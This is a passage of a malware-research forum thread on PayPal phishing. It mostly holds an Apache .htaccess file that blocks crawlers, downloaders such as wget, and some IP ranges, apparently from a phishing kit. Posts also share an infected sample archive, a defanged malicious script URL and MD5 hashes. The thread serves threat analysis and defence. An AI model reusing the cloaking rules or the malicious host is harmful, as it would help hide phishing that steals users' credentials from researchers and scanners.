RewriteCond %{HTTP_USER_AGENT} flashget [NC,OR] # OD 

RewriteCond %{HTTP_USER_AGENT} FlickBot [NC,OR] # rude bot 

RewriteCond %{HTTP_USER_AGENT} "Franklin Locator" [NC,OR] # guestbook spambot 

RewriteCond %{HTTP_USER_AGENT} gais [NC,OR] # Chinese SE 

RewriteCond %{HTTP_USER_AGENT} gazz/ [NC,OR] # Japanese language bot 

RewriteCond %{HTTP_USER_AGENT} geobot [NC,OR] # spain bot 

RewriteCond %{HTTP_USER_AGENT} gethtmlcontent [NC,OR] # OD 

RewriteCond %{HTTP_USER_AGENT} getright [NC,OR] # OD 

RewriteCond %{HTTP_USER_AGENT} girafabot [NC,OR] # girafa.com SE thingy 

RewriteCond %{HTTP_USER_AGENT} giveramp [NC,OR] 

RewriteCond %{HTTP_USER_AGENT} go.?zilla [NC,OR] # OD 

RewriteCond %{HTTP_USER_AGENT} gonzo [NC,OR] 

RewriteCond %{HTTP_USER_AGENT} grabber [NC,OR] # OD 

RewriteCond %{HTTP_USER_AGENT} "green research" [NC,OR] # unknown bot 

RewriteCond %{HTTP_USER_AGENT} "green research, inc." [NC,OR] # unknown bot 

RewriteCond %{HTTP_USER_AGENT} gulper [NC,OR] 

RewriteCond %{HTTP_USER_AGENT} harvest [NC,OR] 

RewriteCond %{HTTP_USER_AGENT} hloader [NC,OR] # unknown downloader 

RewriteCond %{HTTP_USER_AGENT} hoowwwer [NC,OR] # finnish SE 

RewriteCond %{HTTP_USER_AGENT} html2jpg [NC,OR] # HTML to JPG converter 

RewriteCond %{HTTP_USER_AGENT} htmlparser [NC,OR] 

RewriteCond %{HTTP_USER_AGENT} "http generic" [NC,OR] # Unknown agent 

RewriteCond %{HTTP_USER_AGENT} httpclient [NC,OR] # OD Webdown 

RewriteCond %{HTTP_USER_AGENT} httprequest [NC,OR] 

RewriteCond %{HTTP_USER_AGENT} httrack [NC,OR] # OD 

RewriteCond %{HTTP_USER_AGENT} ia_archiver [NC,OR] 

RewriteCond %{HTTP_USER_AGENT} ichiro [NC,OR] # Japanese language bot (see gazz) 

RewriteCond %{HTTP_USER_AGENT} "ie plagin" [NC,OR] 

RewriteCond %{HTTP_USER_AGENT} "ie plugin" [NC,OR] 

RewriteCond %{HTTP_USER_AGENT} imagefetch [NC,OR] # rude bot 

RewriteCond %{HTTP_USER_AGENT} "Indy Library" [NC,OR] # spambot 

RewriteCond %{HTTP_USER_AGENT} "Industry Program" [NC,OR] # guestbook spambot 

RewriteCond %{HTTP_USER_AGENT} "^internet explorer$" [NC,OR] # BS agent 

RewriteCond %{HTTP_USER_AGENT} ineturl [NC,OR] 

RewriteCond %{HTTP_USER_AGENT} innerprise [NC,OR] # innerprise.net 

RewriteCond %{HTTP_USER_AGENT} irlbot [NC,OR] # research bot 

RewriteCond %{HTTP_USER_AGENT} ithenticate [NC,OR] # iThenticate spybot 

RewriteCond %{HTTP_USER_AGENT} iupui [NC,OR] # Unknown research (spam?) bot 

RewriteCond %{HTTP_USER_AGENT} java [NC,OR] # generic textbook bots 

RewriteCond %{HTTP_USER_AGENT} jetbot [NC,OR] # Unknown private SE 

RewriteCond %{HTTP_USER_AGENT} joedog [NC,OR] 

RewriteCond %{HTTP_USER_AGENT} k2spider [NC,OR] # unknown bot 

RewriteCond %{HTTP_USER_AGENT} kuloko [NC,OR] # kuloko.com 

RewriteCond %{HTTP_USER_AGENT} lanshan [NC,OR] 

RewriteCond %{HTTP_USER_AGENT} lcabotaccept [NC,OR] # unknown bot 

RewriteCond %{HTTP_USER_AGENT} larbin [NC,OR] # unknown (spambot) 

RewriteCond %{HTTP_USER_AGENT} lapozz [NC,OR] # BS hungarian bot 

RewriteCond %{HTTP_USER_AGENT} law-x [NC,OR] # scraper site bot 

RewriteCond %{HTTP_USER_AGENT} linksmanager [NC,OR] # linksmanager.com spambot 

RewriteCond %{HTTP_USER_AGENT} linkwalker [NC,OR] # spambot 

RewriteCond %{HTTP_USER_AGENT} lmcrawler [NC,OR] 

RewriteCond %{HTTP_USER_AGENT} lmqueuebot [NC,OR] 

RewriteCond %{HTTP_USER_AGENT} loopimprovements [NC,OR] 

RewriteCond %{HTTP_USER_AGENT} "lwp\:\:simple" [NC,OR] 

RewriteCond %{HTTP_USER_AGENT} "lwp-trivial" [NC,OR] 

RewriteCond %{HTTP_USER_AGENT} "Mac Finder" [NC,OR] # guestbook spambot 

RewriteCond %{HTTP_USER_AGENT} "Microsoft URL Control" [NC,OR] # spambot 

RewriteCond %{HTTP_USER_AGENT} "mister pix" [NC,OR] # rude bot 

RewriteCond %{HTTP_USER_AGENT} "missauga" [NC,OR] # guestbook spambot 

RewriteCond %{HTTP_USER_AGENT} "missigua" [NC,OR] # guestbook spambot 

RewriteCond %{HTTP_USER_AGENT} madlyrics [NC,OR] # Winamp downloader 

RewriteCond %{HTTP_USER_AGENT} marvin [NC,OR] # danish/whoever bot 

RewriteCond %{HTTP_USER_AGENT} microsoftprototypecrawler [NC,OR] 

RewriteCond %{HTTP_USER_AGENT} minirank [NC,OR] 

RewriteCond %{HTTP_USER_AGENT} miva [NC,OR] 

RewriteCond %{HTTP_USER_AGENT} mizzu [NC,OR] # Mizzu Labs bot 

RewriteCond %{HTTP_USER_AGENT} mj12 [NC,OR] 

RewriteCond %{HTTP_USER_AGENT} majestic [NC,OR] 

RewriteCond %{HTTP_USER_AGENT} mogren [NC,OR] # russian bot 

RewriteCond %{HTTP_USER_AGENT} "mozilla\(ie compatible\)" [NC,OR] # BS agent 

RewriteCond %{HTTP_USER_AGENT} MSIECrawler [NC,OR] # IE's "make available offline" mode 

RewriteCond %{HTTP_USER_AGENT} MSFrontPage [NC,OR] # OD 

RewriteCond %{HTTP_USER_AGENT} msrbot [NC,OR] 

RewriteCond %{HTTP_USER_AGENT} msproxy [NC,OR] # discontinued proxy software 

RewriteCond %{HTTP_USER_AGENT} msx [NC,OR] # unknown agent 

RewriteCond %{HTTP_USER_AGENT} mvaclient [NC,OR] 

RewriteCond %{HTTP_USER_AGENT} "my session" [NC,OR] # unknown agent 
RewriteCond %{HTTP_USER_AGENT} "NASA Search" [NC,OR] # bogus clown on comcast 
RewriteCond %{HTTP_USER_AGENT} netresearchserver [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} netsprint [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} netwhat [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} nextgensearch [NC,OR] # BW waster 
RewriteCond %{HTTP_USER_AGENT} nusearch [NC,OR] # spider OD 
RewriteCond %{HTTP_USER_AGENT} nutch [NC,OR] # experimental bot 
RewriteCond %{HTTP_USER_AGENT} ocelli [NC,OR] # www.globalspec.com 
RewriteCond %{HTTP_USER_AGENT} offline [NC,OR] # OD 
RewriteCond %{HTTP_USER_AGENT} omniexplorer [NC,OR] # useless bot 
RewriteCond %{HTTP_USER_AGENT} "onsinn.de" [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} outfoxbot [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} nameprotect [NC,OR] # NameProtect spybot 
RewriteCond %{HTTP_USER_AGENT} naver [NC,OR] # Korean robot 
RewriteCond %{HTTP_USER_AGENT} net.?(ants|mechanic|spider|vampire|zip) [NC,OR] # ODs 
RewriteCond %{HTTP_USER_AGENT} netcaptor [NC,OR] # OD 
RewriteCond %{HTTP_USER_AGENT} nicebot [NC,OR] # stealth bot 
RewriteCond %{HTTP_USER_AGENT} nicerspro [NC,OR] # spambot 
RewriteCond %{HTTP_USER_AGENT} ninja [NC,OR] # Download Ninja OD 
RewriteCond %{HTTP_USER_AGENT} nobody [NC,OR] # Unknown Agent 
RewriteCond %{HTTP_USER_AGENT} noxtrum [NC,OR] # spanish private server 
RewriteCond %{HTTP_USER_AGENT} NPBot [NC,OR] # NameProtect spybot 
RewriteCond %{HTTP_USER_AGENT} "\ obot" [NC,OR] # Unknown bot 
RewriteCond %{HTTP_USER_AGENT} "^obot$" [NC,OR] # Unknown bot 
RewriteCond %{HTTP_USER_AGENT} openfind [NC,OR] # taiwan bot 
RewriteCond %{HTTP_USER_AGENT} panopy [NC,OR] # unknown bot 
RewriteCond %{HTTP_USER_AGENT} patwebbot [NC,OR] # bs bot from germany 
RewriteCond %{HTTP_USER_AGENT} peerfactor [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} pipeline [NC,OR] # cable account based SE 
RewriteCond %{HTTP_USER_AGENT} plink [NC,OR] # stealth bot 
RewriteCond %{HTTP_USER_AGENT} "program shareware" [NC,OR] # guestbook spambot 
RewriteCond %{HTTP_USER_AGENT} plantynet [NC,OR] # Korean bot 
RewriteCond %{HTTP_USER_AGENT} "poe-component-client" [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} "polybot" [NC,OR] # cis.poly.edu 
RewriteCond %{HTTP_USER_AGENT} psbot [NC,OR] # Picture Downloader 
RewriteCond %{HTTP_USER_AGENT} picsearch [NC,OR] # Picture Downloader 
RewriteCond %{HTTP_USER_AGENT} qarp [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} qcreep [NC,OR] # quepasa in disguise 
RewriteCond %{HTTP_USER_AGENT} quepasa [NC,OR] # SouthAmerican bot 
RewriteCond %{HTTP_USER_AGENT} "safari" [NC,OR] # OD 
RewriteCond %{HTTP_USER_AGENT} "^sew$" [NC,OR] # unknown agent 
RewriteCond %{HTTP_USER_AGENT} rampybot [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} research [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} sbider [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} schibstedsok [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} "scientec.de" [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} scspider [NC,OR] # SpamBot 
RewriteCond %{HTTP_USER_AGENT} scumbot [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} search-o-rama [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} searchsight [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} searchwarp [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} seekbot [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} seznambot [NC,OR] # czech bot 
RewriteCond %{HTTP_USER_AGENT} shim-crawler [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} siphon [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} sitemapper [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} sitesell [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} skywalker [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} sleuth [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} SlySearch [NC,OR] # SlySearch spybot 
RewriteCond %{HTTP_USER_AGENT} snagger [NC,OR] # OD 
RewriteCond %{HTTP_USER_AGENT} societyrobot [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} "sohu agent" [NC,OR] # spambot 
RewriteCond %{HTTP_USER_AGENT} sohu-search [NC,OR] # spambot 
RewriteCond %{HTTP_USER_AGENT} sonicquest [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} spider_pro [NC,OR] # innerprise.net 
RewriteCond %{HTTP_USER_AGENT} spiderku [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} spiderman [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} sproose [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} sqworm [NC,OR] # unknown bot 
RewriteCond %{HTTP_USER_AGENT} stackrambler [NC,OR] # russian bot 
RewriteCond %{HTTP_USER_AGENT} steeler [NC,OR] # OD 
RewriteCond %{HTTP_USER_AGENT} SurveyBot [NC,OR] # rude bot 
RewriteCond %{HTTP_USER_AGENT} szukacz [NC,OR] # OD 
RewriteCond %{HTTP_USER_AGENT} tcf [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} tele(port|soft) [NC,OR] # OD 
RewriteCond %{HTTP_USER_AGENT} "test/0" [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} "test1" [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} "test 1" [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} "test rig" [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} "tsw bot" [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} terrawiz [NC,OR] # India SE 
RewriteCond %{HTTP_USER_AGENT} trademark [NC,OR] # bandwidth waster trademarktracker.com 
RewriteCond %{HTTP_USER_AGENT} transgenikbot [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} Turnitin [NC,OR] # Turnitin spybot 
RewriteCond %{HTTP_USER_AGENT} twiceler [NC,OR] # www.cuill.com 
RewriteCond %{HTTP_USER_AGENT} twotrees [NC,OR] # willow internet crawler 
RewriteCond %{HTTP_USER_AGENT} "under the rainbow" [NC,OR] # unknown bot 
RewriteCond %{HTTP_USER_AGENT} "unknown origin" [NC,OR] # unknown bot 
RewriteCond %{HTTP_USER_AGENT} unchaos [NC,OR] # SE that spams web logs 
RewriteCond %{HTTP_USER_AGENT} url2file [NC,OR] # OD 
RewriteCond %{HTTP_USER_AGENT} usyd-nlp  [NC,OR] # research spider 
RewriteCond %{HTTP_USER_AGENT} "vb openurl" [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} visvo [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} votay [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} voyager [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} w3crobot [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} w3mir [NC,OR] # site copier 
RewriteCond %{HTTP_USER_AGENT} wbdbot [NC,OR] #sky.siraza.net 
RewriteCond %{HTTP_USER_AGENT} weasel [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} weazel [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} web.?(auto|bandit|collector|copier|devil|downloader|fetch|hook|mole|miner|mirror|reaper|sauger|sucker|site|snake|stripper|weasel|zip) [NC,OR] # ODs 
RewriteCond %{HTTP_USER_AGENT} webclipping [NC,OR] # bandwidth waster webclipping.com 
RewriteCond %{HTTP_USER_AGENT} webbug [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} webcollage [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} webindexer [NC,OR] # development bot 
RewriteCond %{HTTP_USER_AGENT} webpix [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} webrace [NC,OR] # crawler 
RewriteCond %{HTTP_USER_AGENT} webspider [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} websquash [NC,OR] # SEO 
RewriteCond %{HTTP_USER_AGENT} "wells search" [NC,OR] # spambot 
RewriteCond %{HTTP_USER_AGENT} "wep search" [NC,OR] # spambot 
RewriteCond %{HTTP_USER_AGENT} wget [NC,OR] # OD 
RewriteCond %{HTTP_USER_AGENT} wise-guys.nl [NC,OR] # Clown in NL 
RewriteCond %{HTTP_USER_AGENT} "www.abot.com" [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} xirq [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} yottashopping [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} zao/ [NC,OR] # experimental Japan crawler 
RewriteCond %{HTTP_USER_AGENT} zedzo [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} zeus [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} zspider [NC,OR] 
RewriteCond %{HTTP_REFERER} iaea.org [NC,OR] # spam bot 
RewriteCond %{HTTP_REFERER} wizard.yellowbrick.oz [NC,OR] # spam bot 
RewriteCond %{HTTP_REFERER} brandimensions [NC,OR] # bandidth waster 
RewriteCond %{HTTP_REFERER} imgurl= [NC,OR] 
RewriteCond %{HTTP_REFERER} imgrefurl= [NC,OR] 
RewriteCond %{REMOTE_ADDR} ^193.95.([1-2][0-9][0-9]). [NC,OR] # slovenia etc 
RewriteCond %{REMOTE_ADDR} ^203.147.([0-4][0-9]). [NC,OR] # thailand 
RewriteCond %{REMOTE_ADDR} ^80.87.([3-9][0-9]). [NC,OR] # ghana russia etc 
RewriteCond %{REMOTE_ADDR} ^80.88.(1[0-5][0-9]). [NC,OR] 
RewriteCond %{REMOTE_ADDR} ^203.87.(1[2-9][0-9]). [NC,OR] # philippines 
RewriteCond %{REMOTE_ADDR} ^218.(1[0-9][0-9]). [NC,OR] # china korea 
RewriteCond %{REMOTE_ADDR} ^211.([1-9][0-9]). [NC,OR] # china korea 
RewriteCond %{REMOTE_ADDR} ^66.150.55.(2[2-3][0-9]). [NC,OR] # findwhat.com stealth bot 
RewriteCond %{REMOTE_ADDR} ^64.110.([4-9][0-9]). [NC,OR] 
RewriteCond %{REMOTE_ADDR} ^64.110.(1[0-8][0-9]). [NC] 
RewriteRule .* - [F,L] 
Options -Indexes

Attachments

paypal.zip

infected
(918.94 KiB) Downloaded 61 times

Username

benkow_

Posts

Joined

Sat Jan 24, 2015 12:14 pm

Re: Phish-BankFraud

#30877 by c0d3inj3cT
Mon Oct 02, 2017 7:10 am

Ongoing PayPal Phishing campaign with email bodies encoded using Homographic technique to bypass static analysis.

Write up and details are here: http://www.pwncode.club/2017/10/paypal- ... -body.html

External JS used to dynamically load the PayPal HTML Form: hxxp://www.solutionivy.com/e1e99eb37b7fcecc7a18df3db5e65aac.js (Block it at network level).

HTML sample MD5 hashes:

ab7d6d006297e60311ff078f068a641d
213763dd92271558b5a0bb890b9fe12e
cc00a53518fe4bfb1bb91a9666669a60
f55fb03d626bb894a03339610b6360b0
08420289382d024f619dd33362e7af88
1cebd3b0aed36d88cb0b91b3199e41f8
763bb271183ca4d42c94199f1b9c210a
a504b0e6f5ceb01b525bfd66f2b368fa
21acb6cbb25101ec9f0ecc39dddd130e
befea3711344e43fd5b416b208d56995
a556dc89f48cab14f4ec678975eff822
04596ccd039fe04bfdbe1907fa1bf470

Username

c0d3inj3cT

Posts

Joined

Thu Jan 02, 2014 6:29 am

Location

c0d3inj3ct@Twitter

Contact

Page 5 of 6
51 posts